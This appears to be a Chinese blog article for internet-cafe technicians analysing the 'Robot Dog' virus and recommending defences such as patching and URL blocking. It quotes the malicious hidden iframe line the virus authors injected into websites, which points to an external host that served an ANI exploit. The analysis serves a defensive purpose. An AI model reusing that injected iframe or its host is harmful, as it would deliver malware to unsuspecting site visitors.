查看文章 |
提起“机器狗”病毒,相信每一位工作在网吧的技术人员对此病毒都是恨的牙根疼。数月时间过去了,仍有众多网吧饱受“机器狗”病毒流行的困扰,“机器狗”病毒的横行无疑是中国网吧有史以来遭受的最最沉重打击。可是,肆虐横行的“机器狗”病毒果真无法彻底消灭吗?
如同消灭其泛滥的病毒一样,要想彻底消灭“机器狗”病毒,必须找清该病毒的漏洞,这是能否消灭“机器狗”病毒的关键所在。不过,目前很多防范“机器狗”病毒的方法并没有切中要害,造成了“机器狗”病毒难以消灭的假象。下面,笔者将自己查杀与防范“机器狗”病毒的一些技巧和心得写出来,分享给各位读者。 要消灭病毒必须全面了解病毒 兵法有云“知己知彼,百战不殆”,消灭病毒亦是如此,一味盲目的制订杀毒措施,效果自然大打折扣。为此,在制订查杀“机器狗”病毒的相关策略之前,必须先了解该病毒的特点,传播方式,并从中找出病毒的弱点或漏洞。 对于“机器狗”病毒的历史,相信一些资深的网吧技术人士会有比较深的了解。早在2004年的时候,有人曾在某网吧权威论坛中狂言写出了穿透Deepfreeze(笔者注:俗称“冰点”)和各种还原卡的病毒。三年之后,即2007年的8月的某一天,狂言成为了现实,仍旧在该人士狂言的论坛中,出现了“机器狗”病毒的样本。该病毒当时并没有名字,由于其图标像索尼的机器狗“阿宝”,论坛的人士给该病毒取了一个非常生动的名字“机器狗”。随后,“机器狗”病毒迅速传播,数万家网吧深受其害。
图一索尼机器狗成病毒图标 “机器狗”病毒的作者将病毒代码植入一些网站,然后通过QQ、IE浏览器及邮件等途径进行传播。一旦用户点击了含有病毒代码的链接,“机器狗”病毒会自动下载,然后在硬盘上释放文件。随后,“机器狗”病毒会通过pcihdd.sys驱动文件抢占还原软件的硬盘控制权,并修改用户初始化文件userinit.exe来实现隐藏自身的目的。由于病毒自动保存在系统中后,会定期从指定的网站下载各种木马程序,以截取上网用户的网络游戏帐号信息。 最初,网吧的电脑感染了“机器狗”病毒之后,会威胁用户的帐号安全,因为病毒会自动下载一些盗号木马。不久之后,“机器狗”病毒有了新变种,该变种可以自动下载ARP欺骗病毒,这就是后来流行的“IMG病毒”。更重要的是,“机器狗”病毒的新变种会对userinit.exe进行加密,并且对userinit.exe进行了加壳处理,使病毒具有更强的隐蔽性,致使一些免疫补丁对于“机器狗”的新变种失去了防范作用。 截至目前,“机器狗”病毒仍有新的变种产生。一个新变种的产生,则意味着部分防范措施将失效,如何防范“机器狗”病毒成为困扰网管的一个大难题。要想消灭“机器狗”病毒,必须仔细研究该病毒的各个变种,可以找出病毒的传播途径和弱点,这也是消灭该病毒需要努力的方向。 冷静分析寻找“机器狗”病毒弱点 从“机器狗”病毒的传播过程不难发现,能够破坏还原系统并不是“机器狗”病毒最具破坏力的地方,而是其通过IE链接进入网吧计算机系统,并自动下载木马程序。为此,我们寻找“机器狗”病毒的弱点之时,不要一味想着如何防止病毒破坏网吧计算机系统的还原系统,而是要如何切断“机器狗”病毒的传播途径。试想,封杀了“机器狗”病毒的传播方式,病毒又如何破坏网吧计算机的还原系统呢?通俗的说,要想消灭“机器狗”病毒,必须找到病毒的“根”,正所谓斩草除根嘛。 在传播途径上,杀毒软件厂商经过研究后发现,“机器狗”病毒的传播主要是利用系统或应用软件的漏洞进行的。下面,笔者一一列举可以为“机器狗”病毒传播提供便捷通道的系统漏洞和应用软件漏洞。 MS07-017漏洞:最初,“机器狗”病毒是利用下面一段代码进行传播的,代码内容如下:<iframe src="http://xx.exiao01.com/2.htm" width="20" height="1" frameborder="0"></iframe>病毒作者会将上述代码植入到各大网站中。查看被调用的2.htm的内容不难发现,病毒利用了操作系统的ANI漏洞加载木马,而这一过程恰恰是对微软操作系统MS07-017漏洞的“巧妙”应用。如果网吧机器没有安装MS07-017补丁,一旦访问了病毒代码,“机器狗”病毒便会不请自来。
图二MS07-017漏洞对XP操作系统的影响 MS06-014漏洞:这个漏洞是很多网管都熟悉的一个系统漏洞,即IE自动下载。如果系统存在该漏洞的话,一旦计算机访问到带有“机器狗”病毒代码的网页,会利用IE浏览器的自动下载并执行的漏洞,就这样,“机器狗”病毒就在计算机中安营扎寨。 在网吧的应用环境中,通过IE浏览器上网是每台计算机都有的操作,这无疑加大了感染“机器狗”病毒的机率。由于“机器狗”病毒是通过恶意代码进行传播的,也就是说,凡是可以执行网页代码的应用软件,都有可能成为“机器狗”病毒的传播渠道。 细数网吧的各种应用软件,影音播放软件也是“机器狗”病毒的一大传播通道。众所周知,不少病毒作者会将病毒代码植入影音文件中,一旦用户使用诸如Realplayer等支持网页浏览的播放软件,病毒代码就会被执行,计算机将会感染病毒。Realplayer播放器、百度搜霸、PPStream播放器,以及迅雷客户端,都是“机器狗”病毒传播可以利用的通道。 至此,我们找到了消灭“机器狗”病毒的方向。如果网吧计算机的操作系统及应用软件没有漏洞,“机器狗”病毒是很难感染网吧计算机系统的,更不会破坏网吧计算机的还原软件。为此,我们只要利用技术手段切断“机器狗”病毒的传播,我们就可以彻底消灭“机器狗”病毒,这也是该病毒的一个弱点。 根据弱点制订防范“机器狗”策略 通过上文的叙述我们可以了解到,“机器狗”病毒其实是通过操作系统及应用软件的漏洞进行传播的。如果能够利用技术手段阻止病毒进入网吧计算机,“机器狗”病毒就很难在横行。阻止“机器狗”病毒传播的技术策略主要有以下几个方面: 1、及时安装各类安全补丁:从上文的叙述可以得知,网吧计算机之所以会感染“机器狗”病毒,因为操作系统和一些应用软件存在着诸多的安全漏洞,为此,网管必须在第一时间内安装操作系统和应用软件的安全补丁。 网吧使用的是微软的操作系统,默认情况下,操作系统的自动更新功能是打开的,一旦微软发布新的安全补丁,自动更新功能将会自动安装这些安全补丁。对于诸如Realplayer等应用软件的安全漏洞,建议网管定期升级,一旦软件厂商推出了新版本,及时将网吧电脑的各种应用软件更新到最新的版本。为了方便检查网吧系统漏洞,笔者建议安装“奇虎360安全卫士”,因为该软件不仅可以检测操作系统的安全漏洞,还可以检测诸如Office和Realplay等应用软件的漏洞,并且支持自动安装。
图三软件的安全补丁 2、及时更新病毒库:“机器狗”病毒入侵计算机的过程,其实是通过一个含有恶意代码网页进行传播的。对于一些恶意代码,一部分杀毒软件是具备查杀能力的。为此,要想准确的查杀带有“机器狗”病毒的恶意网页代码,必须及时更新病毒库。 3、安装“机器狗”病毒免疫程序:为了抑制“机器狗”病毒的传播,一些杀毒软件厂商推出了免疫程序,网吧网管可以在计算机中安装此程序,防范病毒入侵。需要引起网吧网管高度注意的是,一些“机器狗”的免疫程序,也有失效期,因为病毒作者也在不断对病毒进行升级。一旦“机器狗”病毒升级,现有的免疫程序将会失效,网管必须安装最新的免疫程序才能防范“机器狗”病毒的入侵。 4、封杀部分病毒传播网址:对于“机器狗”这样非常诡异而且变化多端的病毒,仅仅从软件方面制订策略防范病毒入侵是不够的,还需要从硬件层面做一些预防工作。在路由器中,必须把一些带有“机器狗”病毒代码的网站屏蔽掉,对于新发现的网站,要及时屏蔽。同时,还要在交换机和网吧计算机终端做好IP地址与MAC地址的双向绑定,预防“机器狗”病毒的变种“IMG”病毒。 通过软件加硬件两套防范方案,“机器狗”病毒就可以远离网吧。经过几个月的实际应用发现,上述方法可以非常有效的防范“机器狗”病毒,与现有的“机器狗”病毒治理方案相比更有效。 防范“机器狗”病毒的若干心得 几个月来,为了寻找一种防范“机器狗”病毒的有效方法,笔者查阅了大量的资料,尝试了厂商及网吧技术论坛资深网友写出的若干种方案,最后找到了上文叙述的有效方法来防范“机器狗”病毒。回顾这一艰辛的道路,有以下心得: 1、莫把“还原软件”当神:网吧这个特殊的应用环境,给了“还原软件”用武之地,可是我们每位网吧网管必须清楚,“还原软件”不是神。在过去,操作系统和应用软件有安全漏洞可以不必安装安全补丁,因为有还原软件,“机器狗”病毒的横行,再次告诫我们网管,一定不要轻视操作系统及应用软件的各项安全漏洞。
图四硬件还原卡 2、消灭病毒要找到根源:其实,“机器狗”病毒之所以会在网吧横行数月,主要原因在于网管消灭“机器狗”病毒时没有找到根源。不少网吧一直把整治“机器狗”的重点放在如何防范病毒对还原系统的破坏上,这是一个误区,更不是病毒的根源。“机器狗”病毒的根源在于感染网吧计算机系统,并下载木马软件上。所以,咱们网管同行在遇到顽固的病毒时,一定要先找到病毒的根源,然后连根拨起,病毒到时就不会再嚣张了。 3、病毒防范方法要测试:面对横行的“机器狗”病毒,不少安全软件厂商和技术人才提供了解决方案。对于安全软件厂商和技术人才的努力,我们网管要尊重,但为了网吧计算机的稳定运行,一定要先对病毒防范方法进行测试,然后再投入使用,以免影响网吧的正常运营。 写在最后:肆虐疯狂的“机器狗”病毒在网吧行业横行仅仅是一个开始,未来,还会有更多针对网吧的病毒出现。所以,笔者在此提醒各位网管同行,防范一些顽固病毒,先对病毒做个全面的剖析,然后找出病毒的弱点,最后根据病毒的弱点制定防范策略.遇到顽固的病毒,切忌不能盲目的制订防范策略,与病毒的斗争,要智取,而非蛮干! |
